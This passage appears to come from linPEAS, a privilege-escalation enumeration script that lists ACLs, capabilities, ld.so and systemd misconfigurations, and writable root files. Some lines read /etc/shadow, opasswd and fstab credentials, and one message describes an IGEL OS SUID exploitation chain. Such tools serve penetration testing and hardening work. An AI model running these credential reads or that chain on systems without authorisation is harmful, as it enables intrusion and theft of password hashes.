fi 11823 fi 11824 fi 11825 done 11826 fi 11827 if [ "$LDD" ] || [ "$READELF" ]; then 11828 echo "$ITALIC --- Checking for writable dependencies of $sname...$NC" 11829 fi 11830 if [ "$LDD" ]; then 11831 "$LDD" "$sname" | grep -E "$Wfolders" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" 11832 fi 11833 if [ "$READELF" ]; then 11834 "$READELF" -d "$sname" | grep PATH | grep -E "$Wfolders" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" 11835 fi 11836 if [ "$TIMEOUT" ] && [ "$STRACE" ] && [ -x "$sname" ]; then 11837 printf $ITALIC 11838 echo "----------------------------------------------------------------------------------------" 11839 echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." 11840 OLD_LD_LIBRARY_PATH=$LD_LIBRARY_PATH 11841 export LD_LIBRARY_PATH="" 11842 timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" 11843 printf $NC 11844 export LD_LIBRARY_PATH=$OLD_LD_LIBRARY_PATH 11845 echo "----------------------------------------------------------------------------------------" 11846 echo "" 11847 fi 11848 fi 11849 fi 11850 fi 11851 fi 11852 done; 11853 echo "" 11854 11855 fi 11856 11857 if check_mitre_filter "T1222"; then 11858 print_2title "Files with ACLs (limited to 50)" "T1222" 11859 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#acls" 11860 if ! [ "$SEARCH_IN_FOLDER" ]; then 11861 ( (getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed -${E} "s,$writeVB,${SED_RED_YELLOW},g" | sed -${E} "s,$writeB,${SED_RED},g" 11862 else 11863 ( (getfacl -t -s -R -p $SEARCH_IN_FOLDER 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed -${E} "s,$writeVB,${SED_RED_YELLOW},g" | sed -${E} "s,$writeB,${SED_RED},g" 11864 fi 11865 if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! [ "$(command -v getfacl || echo -n '')" ]; then #Find ACL files in macos (veeeery slow) 11866 ls -RAle / 2>/dev/null | grep -v "group:everyone deny delete" | grep -E -B1 "\d: " | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed -${E} "s,$writeVB,${SED_RED_YELLOW},g" | sed -${E} "s,$writeB,${SED_RED},g" 11867 fi 11868 echo "" 11869 11870 fi 11871 11872 if check_mitre_filter "T1548.001,T1068"; then 11873 if ! [ "$SEARCH_IN_FOLDER" ]; then 11874 print_2title "Capabilities" "T1548.001" 11875 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#capabilities" 11876 if [ "$(command -v capsh || echo -n '')" ]; then 11877 is_hex_cap_value() { 11878 case "$1" in 11879 ""|*[!0-9a-fA-F]*) 11880 return 1 11881 ;; 11882 esac 11883 return 0 11884 } 11885 print_cap_status() { 11886 cap_status_file="$1" 11887 cap_default_sep="$2" 11888 cat "$cap_status_file" | grep Cap | while read -r cap_line; do 11889 cap_name=$(echo "$cap_line" | awk '{print $1}') 11890 cap_value=$(echo "$cap_line" | awk '{print $2}') 11891 cap_sep="$cap_default_sep" 11892 cap_color="$SED_RED" 11893 if [ "$cap_name" = "CapEff:" ]; then 11894 cap_sep=" " 11895 cap_color="$SED_RED_YELLOW" 11896 fi 11897 if is_hex_cap_value "$cap_value"; then 11898 # Memory errors can occur with certain values (e.g., ffffffffffffffff) 11899 # so we redirect stderr to prevent error propagation 11900 echo "$cap_name$cap_sep$(capsh --decode=0x"$cap_value" 2>/dev/null | sed -${E} "s,$capsB,${cap_color},")" 11901 else 11902 echo "$cap_name$cap_sep[Invalid capability format]" 11903 fi 11904 done 11905 } 11906 print_3title "Current shell capabilities" "T1548.001" 11907 print_cap_status "/proc/$$/status" " " 11908 echo "" 11909 print_info "Parent process capabilities" 11910 print_cap_status "/proc/$PPID/status" " " 11911 echo "" 11912 print_3title "Processes with capability sets (non-zero CapEff/CapAmb, limit 40)" "T1548.001" 11913 find /proc -maxdepth 2 -path "/proc/[0-9]*/status" 2>/dev/null | head -n 400 | while read -r proc_status; do 11914 proc_pid=$(echo "$proc_status" | cut -d/ -f3) 11915 proc_name=$(awk '/^Name:/{print $2}' "$proc_status" 2>/dev/null) 11916 proc_uid=$(awk '/^Uid:/{print $2}' "$proc_status" 2>/dev/null) 11917 user_name=$(awk -F: -v uid="$proc_uid" '$3==uid{print $1; exit}' /etc/passwd 2>/dev/null) 11918 [ -z "$user_name" ] && user_name="$proc_uid" 11919 proc_inh=$(awk '/^CapInh:/{print $2}' "$proc_status" 2>/dev/null) 11920 proc_prm=$(awk '/^CapPrm:/{print $2}' "$proc_status" 2>/dev/null) 11921 proc_eff=$(awk '/^CapEff:/{print $2}' "$proc_status" 2>/dev/null) 11922 proc_bnd=$(awk '/^CapBnd:/{print $2}' "$proc_status" 2>/dev/null) 11923 proc_amb=$(awk '/^CapAmb:/{print $2}' "$proc_status" 2>/dev/null) 11924 [ -z "$proc_eff" ] && continue 11925 if [ "$proc_eff" != "0000000000000000" ] || [ "$proc_amb" != "0000000000000000" ]; then 11926 echo "PID $proc_pid ($proc_name) user=$user_name" 11927 proc_inh_dec=$(capsh --decode=0x"$proc_inh" 2>/dev/null) 11928 proc_prm_dec=$(capsh --decode=0x"$proc_prm" 2>/dev/null) 11929 proc_eff_dec=$(capsh --decode=0x"$proc_eff" 2>/dev/null) 11930 proc_bnd_dec=$(capsh --decode=0x"$proc_bnd" 2>/dev/null) 11931 proc_amb_dec=$(capsh --decode=0x"$proc_amb" 2>/dev/null) 11932 echo " CapInh: $proc_inh_dec" | sed -${E} "s,$capsB,${SED_RED},g" 11933 echo " CapPrm: $proc_prm_dec" | sed -${E} "s,$capsB,${SED_RED},g" 11934 echo " CapEff: $proc_eff_dec" | sed -${E} "s,$capsB,${SED_RED_YELLOW},g" 11935 echo " CapBnd: $proc_bnd_dec" | sed -${E} "s,$capsB,${SED_RED},g" 11936 echo " CapAmb: $proc_amb_dec" | sed -${E} "s,$capsB,${SED_RED_YELLOW},g" 11937 echo "" 11938 fi 11939 done | head -n 240 11940 echo "" 11941 else 11942 print_3title "Current shell capabilities" "T1548.001" 11943 (cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$$/status" 11944 echo "" 11945 print_3title "Parent proc capabilities" "T1548.001" 11946 (cat "/proc/$PPID/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$PPID/status" 11947 echo "" 11948 fi 11949 echo "" 11950 echo "Files with capabilities (limited to 50):" 11951 getcap -r / 2>/dev/null | head -n 50 | while read cb; do 11952 capsVB_vuln="" 11953 for capVB in $capsVB; do 11954 capname="$(echo $capVB | cut -d ':' -f 1)" 11955 capbins="$(echo $capVB | cut -d ':' -f 2)" 11956 if [ "$(echo $cb | grep -Ei $capname)" ] && [ "$(echo $cb | grep -E $capbins)" ]; then 11957 echo "$cb" | sed -${E} "s,.*,${SED_RED_YELLOW}," 11958 capsVB_vuln="1" 11959 break 11960 fi 11961 done 11962 if ! [ "$capsVB_vuln" ]; then 11963 echo "$cb" | sed -${E} "s,$capsB,${SED_RED}," 11964 fi 11965 if ! [ "$IAMROOT" ] && [ -w "$(echo $cb | cut -d" " -f1)" ]; then 11966 echo "$cb is writable" | sed -${E} "s,.*,${SED_RED}," 11967 fi 11968 done 11969 echo "" 11970 checkSnapConfineCVE20268933 11971 fi 11972 11973 fi 11974 11975 if check_mitre_filter "T1548.001"; then 11976 if [ -f "/etc/security/capability.conf" ] || [ "$DEBUG" ] || grep -Rqs "pam_cap\.so" /etc/pam.d /etc/pam.conf 2>/dev/null; then 11977 print_2title "Users with capabilities" "T1548.001" 11978 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#capabilities" 11979 if [ -f "/etc/security/capability.conf" ]; then 11980 grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed -${E} "s,$capsB,${SED_RED},g" 11981 else echo_not_found "/etc/security/capability.conf" 11982 fi 11983 echo "" 11984 print_info "Checking if PAM loads pam_cap.so" 11985 pam_cap_lines=$(grep -RIn "pam_cap\.so" /etc/pam.d /etc/pam.conf 2>/dev/null) 11986 if [ "$pam_cap_lines" ]; then 11987 printf "%s\n" "$pam_cap_lines" | sed -${E} "s,pam_cap\\.so,${SED_RED_YELLOW},g" 11988 else 11989 echo_not_found "pam_cap.so in /etc/pam.d or /etc/pam.conf" 11990 fi 11991 echo "" 11992 fi 11993 11994 fi 11995 11996 if check_mitre_filter "T1574.006"; then 11997 if ! [ "$SEARCH_IN_FOLDER" ] && ! [ "$IAMROOT" ]; then 11998 print_2title "Checking misconfigurations of ld.so" "T1574.006" 11999 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#ldso" 12000 if [ -f "/etc/ld.so.conf" ] && [ -w "/etc/ld.so.conf" ]; then 12001 echo "You have write privileges over /etc/ld.so.conf" | sed -${E} "s,.*,${SED_RED_YELLOW},"; 12002 printf $RED$ITALIC"/etc/ld.so.conf\n"$NC; 12003 else 12004 printf $GREEN$ITALIC"/etc/ld.so.conf\n"$NC; 12005 fi 12006 echo "Content of /etc/ld.so.conf:" 12007 cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" 12008 # Check each configured folder and include directives 12009 cat /etc/ld.so.conf 2>/dev/null | while IFS= read -r l; do 12010 l=$(echo "$l" | sed 's/#.*$//' | xargs 2>/dev/null) 12011 [ -z "$l" ] && continue 12012 if echo "$l" | grep -qE '^include[[:space:]]+'; then 12013 ini_path=$(echo "$l" | cut -d " " -f 2) 12014 fpath=$(dirname "$ini_path") 12015 if [ -d "$fpath" ] && [ -w "$fpath" ]; then 12016 echo "You have write privileges over $fpath" | sed -${E} "s,.*,${SED_RED_YELLOW},"; 12017 printf $RED_YELLOW$ITALIC"$fpath\n"$NC; 12018 else 12019 printf $GREEN$ITALIC"$fpath\n"$NC; 12020 fi 12021 if [ "$(find "$fpath" -type f '(' '(' -user "$USER" ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then 12022 echo "You have write privileges over $(find "$fpath" -type f '(' '(' -user "$USER" ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; 12023 fi 12024 for f in $ini_path; do 12025 [ -f "$f" ] || continue 12026 if [ -w "$f" ]; then 12027 echo "You have write privileges over $f" | sed -${E} "s,.*,${SED_RED_YELLOW},"; 12028 printf $RED_YELLOW$ITALIC"$f\n"$NC; 12029 else 12030 printf $GREEN$ITALIC" $f\n"$NC; 12031 fi 12032 cat "$f" 2>/dev/null | grep -v "^#" | while IFS= read -r l2; do 12033 l2=$(echo "$l2" | xargs 2>/dev/null) 12034 [ -z "$l2" ] && continue 12035 if [ -d "$l2" ] && [ -w "$l2" ]; then 12036 echo "You have write privileges over $l2" | sed -${E} "s,.*,${SED_RED_YELLOW},"; 12037 printf $RED_YELLOW$ITALIC" - $l2\n"$NC; 12038 elif [ -d "$l2" ]; then 12039 echo $ITALIC" - $l2"$NC | sed -${E} "s,$ldsoconfdG,${SED_GREEN},g" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"; 12040 fi 12041 done 12042 done 12043 elif [ -d "$l" ] && [ -w "$l" ]; then 12044 echo "You have write privileges over $l" | sed -${E} "s,.*,${SED_RED_YELLOW},"; 12045 printf $RED_YELLOW$ITALIC"$l\n"$NC; 12046 else 12047 echo $ITALIC"$l"$NC | sed -${E} "s,$ldsoconfdG,${SED_GREEN},g" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"; 12048 fi 12049 done 12050 echo "" 12051 if [ -f "/etc/ld.so.preload" ] && [ -w "/etc/ld.so.preload" ]; then 12052 echo "You have write privileges over /etc/ld.so.preload" | sed -${E} "s,.*,${SED_RED_YELLOW},"; 12053 else 12054 printf $ITALIC$GREEN"/etc/ld.so.preload\n"$NC; 12055 fi 12056 cat /etc/ld.so.preload 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" 12057 cat /etc/ld.so.preload 2>/dev/null | while read l; do 12058 if [ -f "$l" ] && [ -w "$l" ]; then echo "You have write privileges over $l" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi 12059 done 12060 fi 12061 12062 fi 12063 12064 if check_mitre_filter "T1546.004"; then 12065 if ! [ "$SEARCH_IN_FOLDER" ]; then 12066 print_2title "Files (scripts) in /etc/profile.d/" "T1546.004" 12067 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#profiles-files" 12068 if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a MacOS 12069 (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/" 12070 check_critial_root_path "/etc/profile" 12071 check_critial_root_path "/etc/profile.d/" 12072 fi 12073 echo "" 12074 fi 12075 12076 fi 12077 12078 if check_mitre_filter "T1543.002"; then 12079 if ! [ "$SEARCH_IN_FOLDER" ]; then 12080 print_2title "Permissions in init, init.d, systemd, and rc.d" "T1543.002" 12081 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#init-initd-systemd-and-rcd" 12082 if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a MacOS 12083 check_critial_root_path "/etc/init/" 12084 check_critial_root_path "/etc/init.d/" 12085 check_critial_root_path "/etc/rc.d/init.d" 12086 check_critial_root_path "/usr/local/etc/rc.d" 12087 check_critial_root_path "/etc/rc.d" 12088 check_critial_root_path "/etc/systemd/" 12089 check_critial_root_path "/lib/systemd/" 12090 fi 12091 echo "" 12092 fi 12093 12094 fi 12095 12096 if check_mitre_filter "T1518.001"; then 12097 if ! [ "$SEARCH_IN_FOLDER" ]; then 12098 if [ -d "/etc/apparmor.d/" ] && [ -r "/etc/apparmor.d/" ]; then 12099 print_2title "AppArmor binary profiles" "T1518.001" 12100 ls -l /etc/apparmor.d/ 2>/dev/null | grep -E "^-" | grep "\." 12101 echo "" 12102 fi 12103 fi 12104 12105 fi 12106 12107 if check_mitre_filter "T1552.001"; then 12108 ##-- IPF) Hashes in passwd file 12109 if ! [ "$SEARCH_IN_FOLDER" ]; then 12110 print_list "Hashes inside passwd file? ........... " 12111 if grep -qv '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED}," 12112 else echo_no 12113 fi 12114 ##-- IPF) Writable in passwd file 12115 print_list "Writable passwd file? ................ " 12116 if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," 12117 elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," 12118 elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," 12119 else echo_no 12120 fi 12121 ##-- IPF) Credentials in fstab 12122 print_list "Credentials in fstab/mtab? ........... " 12123 if grep -qE "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${SED_RED}," 12124 else echo_no 12125 fi 12126 ##-- IPF) Read shadow files 12127 print_list "Can I read shadow files? ............. " 12128 if [ "$(cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null)" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED}," 12129 else echo_no 12130 fi 12131 print_list "Can I read shadow plists? ............ " 12132 possible_check="" 12133 (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no 12134 print_list "Can I write shadow plists? ........... " 12135 possible_check="" 12136 (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -w "$l" ];then echo "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no 12137 ##-- IPF) Read opasswd file 12138 print_list "Can I read opasswd file? ............. " 12139 if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo "" 12140 else echo_no 12141 fi 12142 ##-- IPF) network-scripts 12143 print_list "Can I write in network-scripts? ...... " 12144 if ! [ "$IAMROOT" ] && [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${SED_RED_YELLOW}," 12145 elif [ "$(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges on $(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW}," 12146 else echo_no 12147 fi 12148 ##-- IPF) Read root dir 12149 print_list "Can I read root folder? .............. " 12150 (ls -al /root/ 2>/dev/null | grep -vi "total 0") || echo_no 12151 echo "" 12152 fi 12153 12154 fi 12155 12156 if check_mitre_filter "T1083"; then 12157 if ! [ "$SEARCH_IN_FOLDER" ]; then 12158 print_2title "Searching root files in home dirs (limit 30)" "T1083" 12159 (find $HOMESEARCH -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g") || echo_not_found 12160 echo "" 12161 fi 12162 12163 fi 12164 12165 if check_mitre_filter "T1083"; then 12166 if ! [ "$IAMROOT" ]; then 12167 print_2title "Searching folders owned by me containing others files on it (limit 100)" "T1083" 12168 (find $ROOT_FOLDER -type d -user "$USER" ! -path "/proc/*" ! -path "/sys/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec ls -l {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${C}[1;13m&${C}[0m,g" 12169 echo "" 12170 fi 12171 12172 fi 12173 12174 if check_mitre_filter "T1083"; then 12175 if ! [ "$IAMROOT" ]; then 12176 print_2title "Readable files belonging to root and readable by me but not world readable" "T1083" 12177 (find $ROOT_FOLDER -type f -user root ! -perm -o=r ! -path "/proc/*" 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${SED_RED},"; fi; done) || echo_not_found 12178 echo "" 12179 fi 12180 12181 fi 12182 12183 if check_mitre_filter "T1574.009,T1574.010"; then 12184 if ! [ "$IAMROOT" ]; then 12185 print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 200)" "T1574.009,T1574.010" 12186 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-files" 12187 #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all 12188 obmowbe=$(find $ROOT_FOLDER '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "/dev/*" ! -path "/snap/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n 200) 12189 printf "%s\n" "$obmowbe" | while read l; do 12190 if echo "$l" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$l\n"$NC; 12191 elif echo "$l" | grep -qE "$writeVB"; then 12192 echo "$l" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," 12193 else 12194 echo "$l" | sed -${E} "s,$writeB,${SED_RED}," 12195 fi 12196 done 12197 echo "" 12198 fi 12199 12200 fi 12201 12202 if check_mitre_filter "T1574.009,T1574.010"; then 12203 if ! [ "$IAMROOT" ]; then 12204 print_2title "Interesting GROUP writable files (not in Home) (max 200)" "T1574.009,T1574.010" 12205 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-files" 12206 for g in $(groups); do 12207 iwfbg=$(find $ROOT_FOLDER '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n 200) 12208 if [ "$iwfbg" ] || [ "$DEBUG" ]; then 12209 printf " Group $GREEN$g:\n$NC"; 12210 printf "%s\n" "$iwfbg" | while read l; do 12211 if echo "$l" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$l\n"$NC; 12212 elif echo "$l" | grep -Eq "$writeVB"; then 12213 echo "$l" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," 12214 else 12215 echo "$l" | sed -${E} "s,$writeB,${SED_RED}," 12216 fi 12217 done 12218 fi 12219 done 12220 echo "" 12221 fi 12222 12223 fi 12224 12225 if check_mitre_filter "T1548.001"; then 12226 igel_markers="" 12227 igel_marker_sources="" 12228 if [ -f /etc/os-release ] && grep -qi "igel" /etc/os-release 2>/dev/null; then 12229 igel_markers="Yes" 12230 igel_marker_sources="/etc/os-release" 12231 fi 12232 if [ -f /etc/issue ] && grep -qi "igel" /etc/issue 2>/dev/null; then 12233 igel_markers="Yes" 12234 igel_marker_sources="${igel_marker_sources} /etc/issue" 12235 fi 12236 for marker in /etc/igel /wfs/igel /userhome/.igel /config/sessions/igel; do 12237 if [ -e "$marker" ]; then 12238 igel_markers="Yes" 12239 igel_marker_sources="${igel_marker_sources} $marker" 12240 fi 12241 done 12242 igel_suid_hits="" 12243 for candidate in /usr/bin/setup /bin/setup /usr/sbin/setup /opt/igel/bin/setup /usr/bin/date /bin/date /usr/lib/igel/date; do 12244 if [ -u "$candidate" ]; then 12245 igel_suid_hits="${igel_suid_hits}$(ls -lah "$candidate" 2>/dev/null)\n" 12246 fi 12247 done 12248 if [ -n "$igel_markers" ] || [ -n "$igel_suid_hits" ]; then 12249 print_2title "IGEL OS SUID setup/date privilege escalation surface" "T1548.001" 12250 print_info "https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-11-28-2025" 12251 if [ -n "$igel_markers" ]; then 12252 echo "Potential IGEL OS detected via: $igel_marker_sources" | sed -${E} "s,.*,${SED_GREEN}," 12253 else 12254 echo "IGEL-specific SUID helpers found but IGEL markers were not detected" | sed -${E} "s,.*,${SED_RED}," 12255 fi 12256 if [ -n "$igel_suid_hits" ]; then 12257 echo "SUID-root helpers exposing configuration primitives:" | sed -${E} "s,.*,${SED_RED_YELLOW}," 12258 printf "%b" "$igel_suid_hits" 12259 else 12260 echo "No SUID setup/date binaries were located (system may be patched)." 12261 fi 12262 writable_nm="" 12263 writable_systemd="" 12264 if ! [ "$SUPERFAST" ]; then 12265 if [ -d /etc/NetworkManager ]; then 12266 writable_nm=$(find /etc/NetworkManager -maxdepth 3 -type f -writable 2>/dev/null | head -n 25) 12267 fi 12268 for unitdir in /etc/systemd/system /lib/systemd/system /usr/lib/systemd/system; do 12269 if [ -d "$unitdir" ]; then 12270 tmp_units=$(find "$unitdir" -maxdepth 2 -type f -writable 2>/dev/null | head -n 15) 12271 if [ -n "$tmp_units" ]; then 12272 writable_systemd="${writable_systemd}${tmp_units}\n" 12273 fi 12274 fi 12275 done 12276 fi 12277 if [ -n "$writable_nm" ]; then 12278 echo "Writable NetworkManager profiles/hooks (swap Exec path to your payload):" | sed -${E} "s,.*,${SED_RED_YELLOW}," 12279 echo "$writable_nm" 12280 fi 12281 if [ -n "$writable_systemd" ]; then 12282 echo "Writable systemd unit files (edit ExecStart, then restart via setup/date):" | sed -${E} "s,.*,${SED_RED_YELLOW}," 12283 printf "%b" "$writable_systemd" 12284 fi 12285 printf "$ITALIC Known exploitation chain: Use the SUID setup/date binaries to edit NetworkManager or systemd configs so ExecStart points to your payload, then trigger a service restart via the same helper to run as root (Metasploit linux/local/igel_network_priv_esc).$NC\n" 12286 fi 12287 echo "" 12288 12289 fi 12290 12291 if check_mitre_filter "T1574.009,T1574.010"; then 12292 if ! [ "$IAMROOT" ]; then 12293 print_2title "Writable root-owned executables I can modify (max 200)" "T1574.009,T1574.010" 12294 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-files" 12295 writable_root_execs=$( 12296 find "$ROOT_FOLDER" -type f -user root -perm -u=x \ 12297 \( -perm -g=w -o -perm -o=w \) \ 12298 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/snap/*" ! -path "$HOME/*" 2>/dev/null \ 12299 | while IFS= read -r f; do 12300 if [ -w "$f" ]; then 12301 ls -l "$f" 2>/dev/null 12302 fi 12303 done | head -n 200 12304 ) 12305 if [ "$writable_root_execs" ] || [ "$DEBUG" ]; then 12306 printf "%s\n" "$writable_root_execs" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," 12307 else 12308 echo_not_found "Writable root-owned executables" 12309 fi 12310 echo "" 12311 fi 12312 12313 fi 12314 12315 fi 12316 12317 fi 12318 echo '' 12319 echo '' 12320 if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi 12321 12322 if echo $CHECKS | grep -q interesting_files; then 12323 if check_mitre_filter "T1552.001,T1114.001,T1005,T1564.001,T1574.007,T1083,T1552.007,T1082,T1204.002,T1070.002"; then 12324 print_title "Other Interesting Files" 12325 if check_mitre_filter "T1574.007"; then 12326 if ! [ "$SEARCH_IN_FOLDER" ]; then 12327 print_2title ".sh files in path" "T1574.007" 12328 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scriptbinaries-in-path" 12329 echo $PATH | tr ":" "\n" | while read d; do 12330 for f in $(find "$d" -name "*.sh" -o -name "*.sh.*" 2>/dev/null); do 12331 if ! [ "$IAMROOT" ] && [ -O "$f" ]; then 12332 echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED}," 12333 elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits) 12334 echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW}," 12335 else 12336 echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},"; 12337 fi 12338 done 12339 done 12340 echo "" 12341 broken_links=$(find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken) 12342 if [ "$broken_links" ] || [ "$DEBUG" ]; then 12343 print_2title "Broken links in path" "T1574.007" 12344 echo $PATH | tr ":" "\n" | while read d; do 12345 find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken | sed -${E} "s,broken,${SED_RED},"; 12346 done 12347 echo "" 12348 fi 12349 fi 12350 12351 fi 12352 12353 if check_mitre_filter "T1082"; then 12354 if [ "$SEARCH_IN_FOLDER" ]; then 12355 print_2title "Files datetimes inside the firmware (limit 50)" "T1082" 12356 find "$SEARCH_IN_FOLDER" -type f -printf "%T+\n" 2>/dev/null | sort | uniq -c | sort | head -n 50 12357 echo "To find a file with an specific date execute: find \"$SEARCH_IN_FOLDER\" -type f -printf \"%T+ %p\n\" 2>/dev/null | grep \"<date>\"" 12358 echo "" 12359 fi 